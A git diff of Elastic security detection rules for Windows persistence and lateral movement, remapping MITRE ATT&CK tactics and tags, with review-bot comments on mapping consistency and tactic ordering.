@@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,18 +63,7 @@ references = [ risk_score = 73 rule_id = "25224a80-5a4a-4b8a-991e-6ab390465c4f" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -91,36 +80,46 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml index 22ecd3dc5c9..7737d941df9 100644 --- a/rules/windows/lateral_movement_via_wsus_update.toml +++ b/rules/windows/lateral_movement_via_wsus_update.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -63,20 +63,7 @@ references = ["https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authe risk_score = 47 rule_id = "8e2485b6-a74f-411b-bf7f-38b819f3a846" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -92,14 +79,26 @@ process.executable : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/persistence_ad_adminsdholder.toml b/rules/windows/persistence_ad_adminsdholder.toml index 3c87f58aebf..7cc39bbcbf0 100644 --- a/rules/windows/persistence_ad_adminsdholder.toml 
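Review bot: The new Execution `[[rule.threat]]` entry is inserted ahead of the existing Lateral Movement entry, which makes Execution the first (primary) tactic of a rule whose file is `lateral_movement_via_wsus_update.toml`. The same reordering puts Defense Evasion first in `persistence_evasion_hidden_local_account_creation.toml`, `persistence_evasion_registry_startup_shell_folder_modified.toml` and `persistence_msi_installer_task_startup.toml`, and Initial Access first for rule `8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45` (whose filename is outside this chunk). If the repository's naming check keys the expected filename prefix on the first threat entry, as I believe it does, each of these will fail; in any case the first entry should be the tactic the rule is primarily about. Appending the new `TA0002` block after the existing `TA0008` block, rather than before it, keeps the ordering intact without any other change.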
+++ b/rules/windows/persistence_ad_adminsdholder.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/31" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,16 +60,7 @@ references = [ risk_score = 73 rule_id = "6e9130a5-9be6-48e5-943a-9628bfc74b18" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -80,24 +71,26 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.ObjectDN:CN=Adm [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/persistence_adobe_hijack_persistence.toml b/rules/windows/persistence_adobe_hijack_persistence.toml index 06021e79ce1..92b99f7fa50 100644 --- a/rules/windows/persistence_adobe_hijack_persistence.toml +++ b/rules/windows/persistence_adobe_hijack_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -131,24 +131,13 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.010" -name = "Services File Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/010/" - - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_app_compat_shim.toml b/rules/windows/persistence_app_compat_shim.toml index c99c0974df7..6927c5276c6 100644 --- a/rules/windows/persistence_app_compat_shim.toml +++ b/rules/windows/persistence_app_compat_shim.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -61,19 +61,7 @@ Application Compatibility Shim databases are used in Windows to ensure older app risk_score = 47 rule_id = "c5ce48a6-7f57-4ee8-9313-3d0024caee10" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -99,19 +87,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.011" +name = "Application Shimming" +reference = "https://attack.mitre.org/techniques/T1546/011/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index 7cad2254650..cd530d7df31 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,20 +61,7 @@ AppCert DLLs are dynamic link libraries that can be configured to load with ever risk_score = 47 rule_id = "513f0ffd-b317-4b9c-9494-92ce861f22c7" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -86,36 +73,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.009" name = "AppCert DLLs" reference = "https://attack.mitre.org/techniques/T1546/009/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.009" -name = "AppCert DLLs" -reference = "https://attack.mitre.org/techniques/T1546/009/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_appinitdlls_registry.toml b/rules/windows/persistence_appinitdlls_registry.toml index 350bb9b904f..f123fa5bc79 100644 --- a/rules/windows/persistence_appinitdlls_registry.toml +++ b/rules/windows/persistence_appinitdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
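Review bot: Deleting the Privilege Escalation `[[rule.threat]]` entry (T1546 / T1546.009 under `TA0004`) and the `"Tactic: Privilege Escalation"` tag in the preceding hunk runs opposite to what this same commit does for the sibling sub-techniques: `persistence_app_compat_shim.toml` (T1546.011) and `persistence_evasion_registry_ifeo_injection.toml` (T1546.012) both gain exactly this Persistence + Privilege Escalation dual mapping. T1546 Event Triggered Execution sits under both tactics in ATT&CK, and the rule's own description in the tags hunk header notes that AppCert DLLs are configured to load with every process, which is the privilege-escalation angle. Either keep the `TA0004` block here for consistency with the other T1546 rules, or record in the PR description why AppCert DLLs alone are scoped to Persistence.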
@@ -116,20 +116,7 @@ This rule identifies modifications on the AppInit registry keys. risk_score = 47 rule_id = "d0e159cf-73e9-40d1-a9ed-077e3158a855" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -166,31 +153,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.010" name = "AppInit DLLs" reference = "https://attack.mitre.org/techniques/T1546/010/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_browser_extension_install.toml b/rules/windows/persistence_browser_extension_install.toml index 2141ad620c4..be533d6a05b 100644 --- a/rules/windows/persistence_browser_extension_install.toml 
+++ b/rules/windows/persistence_browser_extension_install.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -115,14 +115,18 @@ file where host.os.type == "windows" and event.type : "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1176" name = "Software Extensions" reference = "https://attack.mitre.org/techniques/T1176/" +[[rule.threat.technique.subtechnique]] +id = "T1176.001" +name = "Browser Extensions" +reference = "https://attack.mitre.org/techniques/T1176/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml index d53df13516f..deb5c340772 100644 --- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml +++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -58,19 +58,7 @@ references = [ risk_score = 73 rule_id = "2edc8076-291e-41e9-81e4-e3fcbc97ae5e" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -86,19 +74,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.002" +name = "Hidden Users" +reference = "https://attack.mitre.org/techniques/T1564/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_evasion_registry_ifeo_injection.toml b/rules/windows/persistence_evasion_registry_ifeo_injection.toml index cdf2e8f627a..d3bf98a2e64 100644 
--- a/rules/windows/persistence_evasion_registry_ifeo_injection.toml +++ b/rules/windows/persistence_evasion_registry_ifeo_injection.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = [ risk_score = 47 rule_id = "6839c821-011d-43bd-bd5b-acff00257226" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -104,31 +91,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 078d2f2153c..92e133bbe17 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
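Review bot: After this hunk the IFEO rule maps only Persistence and Privilege Escalation, yet the file remains `persistence_evasion_registry_ifeo_injection.toml`; T1112 Modify Registry / Defense Evasion is dropped here and in `persistence_appinitdlls_registry.toml`, while the very next file, `persistence_evasion_registry_startup_shell_folder_modified.toml`, keeps its T1112 / Defense Evasion entry and even promotes it to the first position. All three are registry-key persistence rules, so the differing treatment of T1112 reads as inconsistent unless there is a reason only the startup-shell-folder modification counts as evasion; if dropping T1112 is intentional, the `_evasion_` filename component should go with it. Minor style point: in the new `TA0004` block the `[[rule.threat.technique.subtechnique]]` header follows the technique `reference` line with no blank separator, unlike the `TA0003` block just above it.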
@@ -161,31 +161,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml index ddc052d6393..3a73e312b2b 100644 --- a/rules/windows/persistence_group_modification_by_system.toml +++ b/rules/windows/persistence_group_modification_by_system.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/04/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,16 +55,7 @@ Active Directory (AD) is a critical component in Windows environments, managing risk_score = 47 rule_id = "6f024bde-7085-489b-8250-5957efdf1caf" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -79,26 +70,36 @@ not group.id : "S-1-5-21-*-513" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_local_scheduled_task_creation.toml b/rules/windows/persistence_local_scheduled_task_creation.toml index e0bda7e66c5..991d2a51efd 100644 --- a/rules/windows/persistence_local_scheduled_task_creation.toml 
+++ b/rules/windows/persistence_local_scheduled_task_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,15 +60,7 @@ references = [ risk_score = 21 rule_id = "afcce5ad-65de-4ed2-8516-5e093d3ac99a" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -91,19 +83,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_local_scheduled_task_scripting.toml b/rules/windows/persistence_local_scheduled_task_scripting.toml index f8f93d54439..a12faf74c32 100644 --- a/rules/windows/persistence_local_scheduled_task_scripting.toml 
+++ b/rules/windows/persistence_local_scheduled_task_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -28,17 +28,7 @@ Decode the base64 encoded Tasks Actions registry value to investigate the task's risk_score = 47 rule_id = "689b9d57-e4d5-4357-ad17-9c334609d79a" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' 
@@ -57,41 +47,18 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml index 68aedd06281..a4b61f8ccd1 100644 --- a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml +++ 